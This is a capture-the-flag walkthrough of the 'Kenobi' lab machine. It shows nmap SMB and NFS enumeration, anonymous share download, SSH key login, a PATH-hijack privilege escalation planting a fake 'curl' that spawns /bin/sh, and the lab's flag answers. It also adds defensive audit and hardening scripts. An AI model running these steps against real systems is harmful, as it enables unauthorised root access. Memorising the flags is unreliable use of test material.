Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a company's intranet or the internet. It's often referred to as a network file system.
SMB listens on two ports, 445 and 139.
Using the nmap command shown in the steps below, how many shares have been found?
Answer: 3
Steps to Reproduce:
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.108.221 -oN nmap-smb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:16 IST
Nmap scan report for 10.10.108.221
Host is up (0.17s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.108.221\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.108.221\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.108.221\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 25.05 seconds
What file can you see?
Answer: log.txt
Steps to Reproduce:
Connect to the anonymous SMB share with a blank password:
$ smbget -R smb://10.10.108.221/anonymous
Password for [root] connecting to //anonymous/10.10.108.221:
Using workgroup WORKGROUP, user root
smb://10.10.108.221/anonymous/log.txt
Downloaded 11.95kB in 5 seconds
What port is FTP running on?
Answer: 21
What mount can we see?
Answer: /var
Steps to Reproduce:
The nmap port scan will have shown port 111 running the service rpcbind. This is simply a server that maps remote procedure call (RPC) program numbers to universal addresses. When an RPC service starts, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve.
In our case, port 111 gives access to a network file system (NFS). Let's use nmap to enumerate it.
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.108.221
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:28 IST
Nmap scan report for 10.10.108.221
Host is up (0.17s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount:
|_  /var *
| nfs-statfs:
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836536.0  6877092.0  22%   16.0T        32000

Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
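As an added example that is not part of the original walkthrough: a small audit script that reads the two nmap script outputs above (the smb-enum-shares block from the port 445 scan and the nfs-showmount block from the port 111 scan) and reports the two conditions a defender would want to close on this host: shares reachable by anonymous users and NFS exports open to any client. The scan text is embedded as a constructed sample re-typed from the page; the function names are mine.

```python
"""Audit helpers for nmap smb-enum-shares and nfs-showmount output.
Added example, not part of the original walkthrough; function names are mine."""

# Constructed sample: the smb-enum-shares block from the port 445 scan above.
SMB_SCAN = r"""
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.108.221\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.108.221\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.108.221\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""

# Constructed sample: the nfs-showmount / nfs-statfs tail of the port 111 scan above.
NFS_SCAN = r"""
|_
| nfs-showmount:
|_  /var *
| nfs-statfs:
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836536.0  6877092.0  22%   16.0T        32000
"""


def _strip_nse(line):
    """Remove the '| ' / '|_ ' prefix nmap puts on script output lines."""
    return line.lstrip("|_ ").rstrip()


def parse_smb_shares(text):
    """Return {share_unc: {field: value}} from an smb-enum-shares block."""
    shares, current = {}, None
    for raw in text.splitlines():
        line = _strip_nse(raw)
        if line.startswith("\\\\") and line.endswith(":"):   # new share header
            current = line[:-1]
            shares[current] = {}
        elif current is not None and ":" in line:            # "Field: value"
            key, _, value = line.partition(":")
            shares[current][key.strip()] = value.strip()
    return shares


def parse_nfs_exports(text):
    """Return {export_path: [allowed client specs]} from an nfs-showmount block."""
    exports, in_block = {}, False
    for raw in text.splitlines():
        line = _strip_nse(raw)
        if line.startswith("nfs-showmount"):
            in_block = True
            continue
        if in_block:
            if not line.startswith("/"):   # the next script's block begins
                break
            path, *clients = line.split()
            exports[path] = clients
    return exports


def anonymous_shares(shares):
    """Shares a null session can read or write; the first thing an attacker lists."""
    return sorted(n for n, f in shares.items()
                  if f.get("Anonymous access", "<none>") != "<none>")


def world_exports(exports):
    """NFS exports whose client list contains '*' (mountable from anywhere)."""
    return sorted(p for p, c in exports.items() if "*" in c)


def audit(smb_text, nfs_text):
    """One finding string per risky share or export; an empty list means clean."""
    findings = []
    shares = parse_smb_shares(smb_text)
    for name in anonymous_shares(shares):
        findings.append(f"SMB share {name}: anonymous access is {shares[name]['Anonymous access']}")
    for path in world_exports(parse_nfs_exports(nfs_text)):
        findings.append(f"NFS export {path}: exported to every client (*)")
    return findings


if __name__ == "__main__":
    for finding in audit(SMB_SCAN, NFS_SCAN):
        print(finding)
```

Run against the page's scan output it reports three findings: the IPC$ and anonymous shares with anonymous READ/WRITE, and /var exported to `*`. The fixes on the Samba side are `guest ok = no` on the share (or `map to guest = Never` globally) in smb.conf, and on the NFS side replacing `*` in /etc/exports with the specific hosts or subnet that need the mount.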
Gain initial access with ProFtpd
What is the version of ProFtpd?
Answer: 1.3.5
Steps to Reproduce: Check the nmap results or connect using nc <MACHINE_IP> 21.
What is Kenobi's user flag (/home/kenobi/user.txt)?
Answer: d0b0f3f53b6caa532a83915e19224899
Steps to Reproduce:
$ chmod 600 id_rsa
$ ssh -i id_rsa kenobi@10.10.108.221
The authenticity of host '10.10.108.221 (10.10.108.221)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.108.221' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.

Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ ls
share  user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899
Privilege Escalation with Path Variable Manipulation
SUID bits can be dangerous. Some binaries such as passwd need to run with elevated privileges (it resets your password on the system), but other custom files that have the SUID bit set can lead to all sorts of issues.
Usually on such vulnerable machines we find binaries like /usr/bin/sudo and /usr/bin/su with the SUID bit set, but we can't exploit those because we don't have kenobi's password.
So /usr/bin/menu stood out as out of the ordinary.
Run the binary, how many options appear?
Answer: 3
Steps to Reproduce:
$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
Finding the appropriate binaries
On running the various options of /usr/bin/menu, we find that three binaries are being run as root:
/usr/bin/curl (curl -I localhost)
/usr/bin/uname (uname -r)
/sbin/ifconfig (ifconfig)
kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Sun, 16 May 2021 17:33:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0      Link encap:Ethernet  HWaddr 02:f5:a8:1e:1a:65
          inet addr:10.10.108.221  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::f5:a8ff:fe1e:1a65/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:82827 errors:0 dropped:0 overruns:0 frame:0
          TX packets:79967 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3791786 (3.7 MB)  TX bytes:4548369 (4.5 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:214 errors:0 dropped:0 overruns:0 frame:0
          TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:16037 (16.0 KB)  TX bytes:16037 (16.0 KB)
Manipulating the Path Variable
In the /tmp directory, create a file named curl that launches /bin/sh: echo /bin/sh > curl
Change the permission to 777: chmod 777 curl.
Modify the PATH variable so the /tmp directory is checked first.
Execute the /usr/bin/menu binary and choose option 1.
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
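The root shell above comes from one defect: a SUID program ran the bare name `curl` through a shell, so the caller's PATH decided which file was executed as root. As an added example that is not part of the original walkthrough (the source of /usr/bin/menu is not on the page, so the two `run_status_check_*` functions below are my reconstruction of the pattern, not its code), here is the vulnerable resolution next to a hardened one that only accepts root-owned, non-writable executables from a fixed search path, and a constructed demonstration of a planted file in a writable directory winning under shell resolution and losing under the checked one. Function names are mine.

```python
"""Why a privileged program must not resolve helpers via the caller's PATH,
and one hardened pattern. Added example; the Kenobi menu binary's real source
is not on the page, so the run_status_check_* functions are my reconstruction."""
import os
import shutil
import stat
import subprocess
import tempfile

# Fixed search path the privileged program trusts, whatever the caller exported.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def lookup_like_a_shell(name, path_env):
    """What system("curl -I localhost") does: /bin/sh takes the bare name and
    returns the first match in the *inherited* PATH, ownership unchecked."""
    return shutil.which(name, path=path_env)


def is_safe_executable(path):
    """Regular, executable, root-owned and not writable by group or others,
    so no unprivileged user could have replaced it."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IXUSR:
        return False
    if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def resolve_in(name, search_path):
    """Resolve a bare command name, skipping every candidate that fails
    is_safe_executable(); None means refuse to run, never fall back."""
    if not name or "/" in name:          # names only, no caller-supplied paths
        return None
    for directory in search_path.split(":"):
        candidate = os.path.join(directory, name)
        if is_safe_executable(candidate):
            return candidate
    return None


def resolve_trusted(name):
    """Same resolution, but ignoring the caller's PATH entirely."""
    return resolve_in(name, TRUSTED_PATH)


def run_status_check_vulnerable():
    """The pattern the walkthrough abuses: a shell, a bare name, inherited env."""
    return subprocess.run("curl -I localhost", shell=True).returncode


def run_status_check_hardened():
    """Absolute path from the trusted search, no shell, explicit minimal env."""
    curl = resolve_trusted("curl")
    if curl is None:
        return None                      # better to fail than to run the wrong file
    return subprocess.run([curl, "-I", "localhost"],
                          env={"PATH": TRUSTED_PATH}).returncode


def demo_shadowing():
    """Constructed scenario: a world-writable file named 'curl' sits in a
    directory placed first in PATH. Returns (shell_hit, checked_hit): whether
    each resolver picked the planted file."""
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "curl")
        with open(planted, "w") as f:
            f.write("#!/bin/sh\necho shadowed\n")   # harmless marker script
        os.chmod(planted, 0o777)                    # mode 777, as in the walkthrough
        caller_path = tmp + ":" + TRUSTED_PATH
        shell_hit = lookup_like_a_shell("curl", caller_path)
        checked_hit = resolve_in("curl", caller_path)
        return shell_hit == planted, checked_hit == planted


if __name__ == "__main__":
    print("shell picks planted file:", demo_shadowing()[0])
    print("checked resolver picks planted file:", demo_shadowing()[1])
    print("trusted curl:", resolve_trusted("curl"))
```

`demo_shadowing()` returns `(True, False)`: the shell-style lookup stops at the planted file while the checked resolver skips it because it is writable by others (and, when run unprivileged, not root-owned). The same fix in a C program is an absolute path passed to execve() with a fixed envp instead of system() with a bare command name; either way, a SUID binary that invokes helpers by bare name is the thing to audit for.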
What is the root flag (/root/root.txt)?
Answer: 177b3cd8562289f37382721c28381f02
Steps to Reproduce:
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02